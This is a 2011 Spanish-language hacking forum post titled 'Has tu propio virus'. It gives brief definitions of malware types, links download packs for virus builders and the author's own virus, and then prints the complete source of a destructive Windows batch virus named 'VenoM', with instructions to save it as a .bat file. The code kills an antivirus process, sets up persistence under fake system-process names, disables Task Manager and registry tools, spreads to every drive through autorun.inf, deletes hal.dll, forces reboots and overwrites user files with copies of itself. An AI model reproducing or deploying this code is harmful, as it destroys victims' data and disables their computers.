Bienvenido al foro de Hacking Elite Group..

Espero que disfrute el foro. Por mas información comuníquese con los administradores.

Nuestro grupo:https://www.facebook.com/groups/HackingElit/
Nuestra Web:http:http://hackingelitegroup.net.ms/
Nuestro Foro:http://hackingelitegroup.forumotion.com/


Saludos ATTA: DeathHack
Buscar
 
 

Resultados por:
 


Rechercher Búsqueda avanzada

Últimos temas
» Que tal, Me presento.
Lun Ene 19, 2015 3:27 am por Don Ghafka

» Me Presento
Jue Jul 11, 2013 4:41 pm por tolete

» me presento
Sáb Ene 26, 2013 5:47 am por BTO911

» Curso de seguridad informatica
Lun Ene 21, 2013 5:20 pm por 616e6f6e

» OpenHack Fedris 3.04 Final
Lun Ene 21, 2013 12:53 pm por DeathHack

» buenas me presento
Sáb Dic 01, 2012 3:18 am por anonsmoke

» Crack Para Photoshop
Lun Sep 10, 2012 1:59 pm por The_mach

» Cursos online gratuitos
Lun Sep 10, 2012 12:28 am por The_mach

» Curso de Hacking y Cracking
Vie Sep 07, 2012 2:59 pm por SokarTefnut

Diciembre 2018
LunMarMiérJueVieSábDom
     12
3456789
10111213141516
17181920212223
24252627282930
31      

Calendario Calendario

Conectarse

Recuperar mi contraseña




No estás conectado. Conéctate o registrate

Has tu propio virus

Ir abajo  Mensaje [Página 1 de 1.]

1 Has tu propio virus el Sáb Dic 03, 2011 2:23 am

DeathHack

avatar
Admin



Un virus informático es un malware que tiene por objeto alterar el normal funcionamiento de la computadora, sin el permiso o el conocimiento del usuario. Los virus, habitualmente, reemplazan archivos ejecutables por otros infectados con el código de este. Los virus pueden destruir, de manera intencionada, los datos almacenados en un ordenador, aunque también existen otros más inofensivos, que solo se caracterizan por ser molestos.

Los virus informáticos tienen, básicamente, la función de propagarse a través de un software, no se replican a sí mismos porque no tienen esa facultad[cita requerida] como el gusano informático, son muy nocivos y algunos contienen además una carga dañina (payload) con distintos objetivos, desde una simple broma hasta realizar daños importantes en los sistemas, o bloquear las redes informáticas generando tráfico inútil.

El funcionamiento de un virus informático es conceptualmente simple. Se ejecuta un programa que está infectado, en la mayoría de las ocasiones, por desconocimiento del usuario. El código del virus queda residente (alojado) en la memoria RAM de la computadora, aun cuando el programa que lo contenía haya terminado de ejecutarse. El virus toma entonces el control de los servicios básicos del sistema operativo, infectando, de manera posterior, archivos ejecutables que sean llamados para su ejecución. Finalmente se añade el código del virus al programa infectado y se graba en el disco, con lo cual el proceso de replicado se completa.






TROYANO
Un troyano informático, a primera vista parece ser un programa útil, pero en realidad hará daño una vez instalado en tu PC, los usuarios normalmente son engañados al abrirlos porque creen que han recibido un programa de procedencia segura, cuando se activa un troyano en tu ordenador, los resultados pueden variar tu información



GUSANO
Los Gusanos no causan necesariamente daños al software o hardware, pero si viajan en secreto reproduciéndose a través de la red, en este trayecto algunos copian información, ya sea contraseñas o documentos.




SPYWARE
Son programas espías que recopilan información sobre una persona u organización sin conocimiento. La función más común que tienen estos programas es la de recopilar información sobre el usuario y distribuirlo a empresas publicitarias u otras organizaciones interesadas.



ADWARE
Software que despliega publicidad de distintos productos o servicios. Estas aplicaciones incluyen código adicional que muestra la publicidad en ventanas emergentes, o a través de una barra que aparece en la pantalla simulando ofrecer distintos servicios útiles para el usuario


EXPLOIT
Un xploit es aquel software que ataca una vulnerabilidad particular de un sistema operativo. Estos no son necesariamente maliciosos –son generalmente creados por investigadores de seguridad informática para demostrar que existe una vulnerabilidad y por esto son componentes comunes de los programas maliciosos como los gusanos informáticos.



KEYLOGGERS
Son programas espías, que toman el control de los equipos, para espiar y robar información, monitorea el sistema, registrando las pulsaciones del teclado, para robar las claves, tanto de páginas financieras y correos electrónicos o cualquier información introducida por medio del teclado.



ROOTKITS
Los rootkits son un set especial de herramientas de ataque. Estas herramientas se utilizan para esconder los procesos y archivos que permiten a un atacante ingrese a la computadora y pueda ganar niveles de acceso en el sistema, siendo el fin tomar el control de la computadora sin ser detectado y sin dejar rastro.



VIRUS
Los virus informáticos son programas que modifican otros programas para incluir una copia ejecutable y posiblemente alterada de ellos mismos. Estos programas malignos son fáciles de crear y en muchos casos difíciles de detectar.


BACKDOOR
Los Backdoors son una puerta de entrada trasera a una computadora, programa o sistema en general, este permite a los atacantes tomar el control de seguridad ganado acceso al sistema. Esta clase de malware permite controlar remotamente la computadora utilizando puertos de comunicación a biertos.



SPAM
Se le llama spam a los e-mailes basura, que son enviados masivamente a direcciones electrónicas compradas por empresas con la finalidad de vender sus productos. Actualmente existen filtros que bloquean los spam en la mayoría de los servidores de correo, además de existir ya legislación contra los spam,



PHISHINGS
Del inglés "fishing" (pescando), se utiliza para identificar la acción fraudulenta de conseguir información confidencial, vía correo electrónico o página web, con el propósito de que los usuarios de cuentas bancarias lo contesten, o entren a páginas aparentemente iguales a la del banco o de los portales con ingreso por contraseña.



Porndial/Dialer
(Marca un número telefónico a través del modem a números que cobran altas tarifas por minuto, normalmente solo operan en Usa y Europa).


Como crear virus

Hoy les dejare para que lo descargen diferentes formas de como crear virus............
Tambien hay formas de crear troyanos y virus gusanos

NO ME AGO RESPONSABLE DE SU USO.................

link:
megaupload.com ARG5DN5M



ahora les dejo el link de un virus que lo ise yo:
multiupload.com 8K7I6WW9QZ


Les dejo un codigo fuente de un virus muy bueno que ya no lo uso mas XD


solo habren el BLOG DE NOTAS y ponen estos codigos:

Código:
@shift 1
@echo off
echo ***Inicia proceso de Micro$oft*** %0 %username% %date% %time% >>"%appdata%\desktop.log
if %COMPUTERNAME%==DESKTOP goto NOT
if '%COMPUTERNAME%== ' goto NOT
set YU=C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z
set TU=F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z
goto ini
:NOT
set YU=C,D,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z
set TU=G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z
:ini
set a=%random%
taskkill /f /im Ad-Watch.exe
copy /y %0 "%Windir%\System\winlogon.exe"
if exist "%Windir%\System\winlogon.exe" goto cop
copy /y %0 "%appdata%\smss.exe"
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v CFTMON.EXE /t REG_SZ /d "%appdata%\smss.exe" /f

:cop
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v CFTMON.EXE /t REG_SZ /d "%Windir%\System\winlogon.exe" /f
if %COMPUTERNAME%==DESKTOP goto NO
if '%COMPUTERNAME%== ' goto NO
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFolderOptions /t REG_DWORD /d "1" /f
reg add "HKCU\Software\Microsoft\Windows\Currentversion\Policies\System" /v DisableTaskMgr /t reg_dword /d "1" /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t reg_dword /d "1" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL" /v CheckedValue /t reg_dword /d "1" /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Hidden /t REG_DWORD /d "2" /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d "1" /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d "0" /f
reg add "HKCU\_VenoM_Software_%a%%a%%a%\Virus" /v estas /d "infectado"
copy /y %0 "%userprofile%\Men£ Inicio\Programas\Inicio\MS-DOS.pif"
copy /y %0 "%systemdrive%\Docume~1\Default User\Men£ Inicio\Programas\Inicio\System.exe"
copy /y %0 "%userprofile%\SendTo\Mis documetos.exe"
copy /y %0 "%userprofile%\SendTo\Disco extraible.pif"
copy /y %0 "%userprofile%\SendTo\Documentos compartidos.scr"
cd %userprofile%
date /t>desktop.inf
find "2008" desktop.inf
if errorlevel 0 if not errorlevel 1 goto Dr

:NO
attrib +h %windir%
copy /y %0 "%systemdrive%\WINDOWS.EXE"
copy /y %0 "%windir%\system32\%username% 3D.scr"
copy /y %0 "%userprofile%\Men£ Inicio\Mis documentos.exe"
copy /y %0 "%userprofile%\Datosd~1\Microsoft\Internet Explorer\Quick Launch\Mis documentos.exe"
copy /y %0 "%systemdrive%\RECYCLER\Documendos borrados de %username%.exe"
copy /y %0 "%systemdrive%\RECYCLER\Papelera de reciclaje compartida.exe"
cd "%userprofile%"
echo [autorun>>autorun.inf
echo open=VenoM.666\Explorer.exe>>autorun.inf
echo shell\Open=>>autorun.inf
echo shell\Open\Command=.\VenoM.666\Explorer.exe>>autorun.inf
echo shell\Explore\=>>autorun.inf
echo shell\Explore\Command=.\VenoM.666\Explorer.exe>>autorun.inf
echo shell\find\=>>autorun.inf
echo shell\find\Command=.\VenoM.666\Explorer.exe>>autorun.inf
echo shell\CMD=Sïmbolo del sistema>>autorun.inf
echo shell\CMD\Command=.\VenoM.666\Explorer.exe>>autorun.inf
for %%h in (%YU%) do if exist %%h:\*.* attrib -h -s %0© /y %0 "%%h:\100%% %username%.exe"&attrib -r -a -s -h %%h:\*.inf>Nul© /y autorun.inf %%h:\autorun.inf>Nul&attrib +s +h +r +a %%h:\autorun.inf>Nul&md %%h:\VenoM.666>Nul© /y %0 %%h:\VenoM.666\Explorer.exe>Nul&attrib +s +h %%h:\VenoM.666\*.exe>Nul&attrib +s +h %%h:\VenoM.666&echo %username%---%date%---%time% in %%h:>>"%appdata%\desktop.inf"
if %COMPUTERNAME%==DESKTOP goto l
if '%COMPUTERNAME%== ' goto l
cd "%userprofile%"
echo "El juego a terminado. Tu has sido derrotado por VenoM (Metauro_3 @hotmail.com).">VenoM.txt
echo.>>VenoM.txt
echo ÛÛÛÛÛÛÛ ÛÛÛÛ
echo ÛÛÛÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ>>VenoM.txt
echo ÛÛÛÛ ÛÛ ÛÛÛÛÛ ÛÛÛ Û>>VenoM.txt
echo ÛÛÛÛ ÛÛ ÛÛÛ Û ÛÛÛ Û>>VenoM.txt
echo ÛÛÛÛ ÛÛ ÛÛÛÛÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛÛÛ ÛÛÛ Û ÛÛÛ Û>>VenoM.txt
echo ÛÛÛÛ ÛÛ ÛÛÛ Û ÛÛÛÛÛ Û ÛÛÛ Û ÛÛÛ Û ÛÛÛ Û>>VenoM.txt
echo ÛÛÛÛ ÛÛ ÛÛÛ Û ÛÛÛÛ Û ÛÛÛ Û ÛÛÛ ÛÛÛ Û>>VenoM.txt
echo ÛÛÛÛ ÛÛ ÛÛÛÛÛÛÛÛ ÛÛÛ Û ÛÛÛ Û ÛÛÛ Û>>VenoM.txt
echo ÛÛÛÛ ÛÛ ÛÛÛ ÛÛÛ Û ÛÛÛ Û ÛÛÛ Û>>VenoM.txt
echo ÛÛÛÛÛÛÛ ÛÛÛ Û ÛÛÛ Û ÛÛÛ Û ÛÛÛ Û>>VenoM.txt
echo ÛÛÛÛ ÛÛÛÛÛÛÛ ÛÛÛ Û ÛÛÛÛÛ ÛÛÛÛÛ ÛÛÛ>>VenoM.txt

copy /y VenoM.txt "%userprofile%\SendTo\Game Over %a%%a%.txt"
print VenoM.txt
for /l %%t in (1,1,24) do at %%t /delete
set h=0

:q
at %h%:13 /interactive "%userprofile%\VenoM.txt"
set /a h=%h%+1
if %h%==24 goto l
goto q

:l
if exist "%appdata%\services.exe" goto bl
copy /y %0 "%appdata%\services.exe"
:bl
if exist "%appdata%\lsass.exe" goto oz
copy /y %0 "%appdata%\lsass.exe"
:oz
if %0=="%appdata%\services.exe" goto ser
if %0=="%appdata%\lsass.exe" goto w

"%appdata%\services.exe"
"%appdata%\lsass.exe"
exit

:w
cd "%userprofile%"
for %%h in (%YU%) do if exist %%h:\*.* (if not exist "%%h:\VenoM.666\Explorer.exe" goto d )
for %%h in (%YU%) do if exist %%h:\*.* (if not exist "%%h:\autorun.inf" goto d )
goto w

:d
cd "%userprofile%"
for %%h in (%YU%) do if exist %%h:\*.* attrib -h -s %0© /y %0 "%%h:\100%% %username%.exe"&attrib -r -a -s -h %%h:\*.inf© /y autorun.inf %%h:\autorun.inf&attrib +s +h +r +a %%h:\autorun.inf&md %%h:\VenoM.666© /y %0 %%h:\VenoM.666\Explorer.exe&attrib +s +h %%h:\VenoM.666\*.exe&attrib +s +h %%h:\VenoM.666&echo %username%---%date%---%time% in %%h:>>"%appdata%\desktop.inf"
goto w

r
if %COMPUTERNAME%==DESKTOP exit
del /f /q "%windir%\system32\hal.dll"
cd "%userprofile%\Men£ Inicio\Programas\Inicio\"
echo shutdown -r -f -t 00>VenoM.bat
echo OPTION EXPLICIT>VenoM.vbs
echo DIM clave>>VenoM.vbs
echo DO WHILE (clave ^<^> "666">>VenoM.vbs
echo clave = msgbox ("", VBCRITICAL, "">>VenoM.vbs
echo clave = msgbox ("Maiden Germany", VBCRITICAL, "VenoM 4.2">>VenoM.vbs
echo clave = msgbox ("metauro_3 @hotmail.com", VBCRITICAL, "VenoM">>VenoM.vbs
echo LOOP>>VenoM.vbs
start VenoM.vbs
shutdown -r -f -t 120 -c "Welcome to Hell"

:B
echo
goto B

:ser
cd "%appdata%"
set u=%0
dir "%userprofile%\misdoc~1\*." /b /s >"%appdata%\NTUSER.DAT.DLL"
for %%f in (%TU%) do if exist %%f:\*.* (dir "%%f:\*." /b /s) >>"%appdata%\NTUSER.DAT.DLL"
for /f "tokens=* delims= " %%a in (NTUSER.DAT.DLL) do call :V "%%a"
:V
set t=%1
copy /y %u% %t%.exe


luego tienesn que guardarlo con la terminacion .bat
y listo hay tienen un dañino virus muy potente....

AVISO
NO ME AGO RESPONSABLE DEL MAL USO DE ESTE..

http://hackingelitegroup.blogspot.com/

Volver arriba  Mensaje [Página 1 de 1.]

Permisos de este foro:
No puedes responder a temas en este foro.